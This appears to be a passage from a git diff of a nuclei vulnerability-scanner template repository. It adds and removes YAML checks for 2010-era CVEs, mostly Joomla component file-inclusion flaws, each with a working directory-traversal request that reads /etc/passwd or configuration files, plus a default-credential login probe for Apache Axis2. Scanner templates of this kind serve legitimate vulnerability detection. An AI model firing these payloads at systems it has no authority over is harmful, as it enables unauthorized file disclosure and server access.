CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. + reference: + - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 + - http://www.adobe.com/support/security/bulletins/apsb10-18.html + - http://securityreason.com/securityalert/8148 + remediation: Upgrade to a supported version. + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 + cve-id: CVE-2010-2861 + cwe-id: CWE-22 + metadata: + max-request: 1 + shodan-query: http.component:"Adobe ColdFusion" + tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en" + + matchers-condition: and + matchers: + + - type: word + words: + - "rdspassword=" + - "encrypted=" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-3203.yaml b/nuclei-templates/CVE-2010/CVE-2010-3203.yaml new file mode 100644 index 0000000000..17042d0b25 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-3203.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval + author: daffainfo + severity: high + description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + - http://secunia.com/advisories/41187 + - http://www.exploit-db.com/exploits/14845 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml new file mode 100644 index 0000000000..9a7401132f --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-3426 + +info: + name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14964 + - https://www.cvedetails.com/cve/CVE-2010-3426 + - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt + - http://www.exploit-db.com/exploits/14964 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-3426 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4231.yaml b/nuclei-templates/CVE-2010/CVE-2010-4231.yaml deleted file mode 100644 index 3c77231b1e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4231.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-4231 - -info: - name: Camtron CMNC-200 IP Camera - Directory Traversal - author: daffainfo - severity: high - description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - - https://www.exploit-db.com/exploits/15505 - - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt - - http://www.exploit-db.com/exploits/15505/ - remediation: Upgrade to a supported product version. - classification: - cve-id: CVE-2010-4231 - tags: cve,cve2010,iot,lfi,camera - -requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml new file mode 100644 index 0000000000..3b556de705 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-4239 + +info: + name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion + author: 0x_akoko + severity: high + description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion + reference: + - https://www.cvedetails.com/cve/CVE-2010-4239 + - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2010-4239 + cwe-id: CWE-20 + tags: cve,cve2010,tikiwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2010/CVE-2010-4282.yaml b/nuclei-templates/CVE-2010/CVE-2010-4282.yaml deleted file mode 100644 index 527fe7df51..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4282.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-4282 - -info: - name: phpShowtime 2.0 - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. - reference: - - https://www.exploit-db.com/exploits/15643 - - https://www.cvedetails.com/cve/CVE-2010-4282 - - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - - http://www.exploit-db.com/exploits/15643 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4282 - tags: cve,cve2010,lfi,joomla,phpshowtime - -requests: - - method: GET - path: - - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4617.yaml b/nuclei-templates/CVE-2010/CVE-2010-4617.yaml deleted file mode 100644 index f172f0e5d8..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4617.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-4617 - -info: - name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15791 - - https://www.cvedetails.com/cve/CVE-2010-4617 - - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4617 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml new file mode 100644 index 0000000000..a9ab51ae4f --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-4719 + +info: + name: Joomla! Component JRadio - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15749 + - https://www.cvedetails.com/cve/CVE-2010-4719 + - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt + - http://www.exploit-db.com/exploits/15749 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4977.yaml b/nuclei-templates/CVE-2010/CVE-2010-4977.yaml deleted file mode 100644 index 710afbfc65..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4977.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-4977 - -info: - name: Joomla! Component Canteen 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34250 - - https://www.cvedetails.com/cve/CVE-2010-4977 - - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4977 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2010/CVE-2010-5286.yaml b/nuclei-templates/CVE-2010/CVE-2010-5286.yaml new file mode 100644 index 0000000000..4513d4a5de --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-5286.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-5286 + +info: + name: Joomla! Component Jstore - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34837 + - https://www.cvedetails.com/cve/CVE-2010-5286 + - http://www.securityfocus.com/bid/44053 + - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-5286 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2010/cve-2010-0219.yaml b/nuclei-templates/CVE-2010/cve-2010-0219.yaml new file mode 100644 index 0000000000..9e44b7dcc9 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0219.yaml @@ -0,0 +1,49 @@ +id: CVE-2010-0219 + +info: + name: Apache Axis2 Default Login + author: pikpikcu + severity: high + description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + tags: cve,cve2010,axis,apache,default-login,axis2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 + - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + classification: + cve-id: CVE-2010-0219 + +requests: + - raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + + payloads: + username: + - admin + password: + - axis2 + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2010/cve-2010-0696.yaml b/nuclei-templates/CVE-2010/cve-2010-0696.yaml new file mode 100644 index 0000000000..66f1da7c88 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0696.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0696 + +info: + name: Joomla! Component Jw_allVideos - Arbitrary File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/11447 + - https://www.cvedetails.com/cve/CVE-2010-0696 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-0759.yaml b/nuclei-templates/CVE-2010/cve-2010-0759.yaml deleted file mode 100644 index 85c6ddd98e..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-0759.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-0759 - -info: - name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. - reference: - - https://www.exploit-db.com/exploits/11498 - - https://www.cvedetails.com/cve/CVE-2010-0759 - tags: cve,cve2010,joomla,lfi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-0944.yaml b/nuclei-templates/CVE-2010/cve-2010-0944.yaml deleted file mode 100644 index 075c61c086..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-0944.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-0944 - -info: - name: Joomla! Component com_jcollection - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11088 - - https://www.cvedetails.com/cve/CVE-2010-0944 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-0972.yaml b/nuclei-templates/CVE-2010/cve-2010-0972.yaml deleted file mode 100644 index 10db45dc6c..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-0972.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-0972 - -info: - name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11738 - - https://www.cvedetails.com/cve/CVE-2010-0972 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-0982.yaml b/nuclei-templates/CVE-2010/cve-2010-0982.yaml new file mode 100644 index 0000000000..9fa799d4c8 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0982.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0982 + +info: + name: Joomla! Component com_cartweberp - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10942 + - https://www.cvedetails.com/cve/CVE-2010-0982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-0985.yaml b/nuclei-templates/CVE-2010/cve-2010-0985.yaml new file mode 100644 index 0000000000..8a68ba32ca --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0985.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0985 + +info: + name: Joomla! Component com_abbrev - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10948 + - https://www.cvedetails.com/cve/CVE-2010-0985 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1056.yaml b/nuclei-templates/CVE-2010/cve-2010-1056.yaml deleted file mode 100644 index 2049880870..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1056.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1056 - -info: - name: Joomla! Component com_rokdownloads - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11760 - - https://www.cvedetails.com/cve/CVE-2010-1056 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1307.yaml b/nuclei-templates/CVE-2010/cve-2010-1307.yaml new file mode 100644 index 0000000000..70c1ac485f --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1307.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1307 + +info: + name: Joomla! Component Magic Updater - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12070 + - https://www.cvedetails.com/cve/CVE-2010-1307 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1313.yaml b/nuclei-templates/CVE-2010/cve-2010-1313.yaml deleted file mode 100644 index 46a6e36549..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1313.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1313 - -info: - name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12082 - - https://www.cvedetails.com/cve/CVE-2010-1313 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1314.yaml b/nuclei-templates/CVE-2010/cve-2010-1314.yaml new file mode 100644 index 0000000000..0d487cfbda --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1314.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1314 + +info: + name: Joomla! Component Highslide 1.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12086 + - https://www.cvedetails.com/cve/CVE-2010-1314 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1340.yaml b/nuclei-templates/CVE-2010/cve-2010-1340.yaml deleted file mode 100644 index d369a9ddb3..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1340.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1340 - -info: - name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/33797 - - https://www.cvedetails.com/cve/CVE-2010-1340 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1345.yaml b/nuclei-templates/CVE-2010/cve-2010-1345.yaml deleted file mode 100644 index 814e4ab08a..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1345.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1345 - -info: - name: Joomla! Component Cookex Agency CKForms - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15453 - - https://www.cvedetails.com/cve/CVE-2010-1345 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1354.yaml b/nuclei-templates/CVE-2010/cve-2010-1354.yaml deleted file mode 100644 index 2b37852cfc..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1354.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1354 - -info: - name: Joomla! Component VJDEO 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12102 - - https://www.cvedetails.com/cve/CVE-2010-1354 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1461.yaml b/nuclei-templates/CVE-2010/cve-2010-1461.yaml new file mode 100644 index 0000000000..1e3d3663a4 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1461.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1461 + +info: + name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12232 + - https://www.cvedetails.com/cve/CVE-2010-1461 + tags: cve,cve2010,joomla,lfi,photo + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1470.yaml b/nuclei-templates/CVE-2010/cve-2010-1470.yaml deleted file mode 100644 index bcb3e84703..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1470.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1470 - -info: - name: Joomla! Component Web TV 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12166 - - https://www.cvedetails.com/cve/CVE-2010-1470 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1471.yaml b/nuclei-templates/CVE-2010/cve-2010-1471.yaml deleted file mode 100644 index b68e50d8b6..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1471.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1471 - -info: - name: Joomla! Component Address Book 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12170 - - https://www.cvedetails.com/cve/CVE-2010-1471 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1474.yaml b/nuclei-templates/CVE-2010/cve-2010-1474.yaml deleted file mode 100644 index bad1b8ef59..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1474.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1474 - -info: - name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12182 - - https://www.cvedetails.com/cve/CVE-2010-1474 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1475.yaml b/nuclei-templates/CVE-2010/cve-2010-1475.yaml deleted file mode 100644 index 44a2dd1650..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1475.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1475 - -info: - name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12147 - - https://www.cvedetails.com/cve/CVE-2010-1475 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - 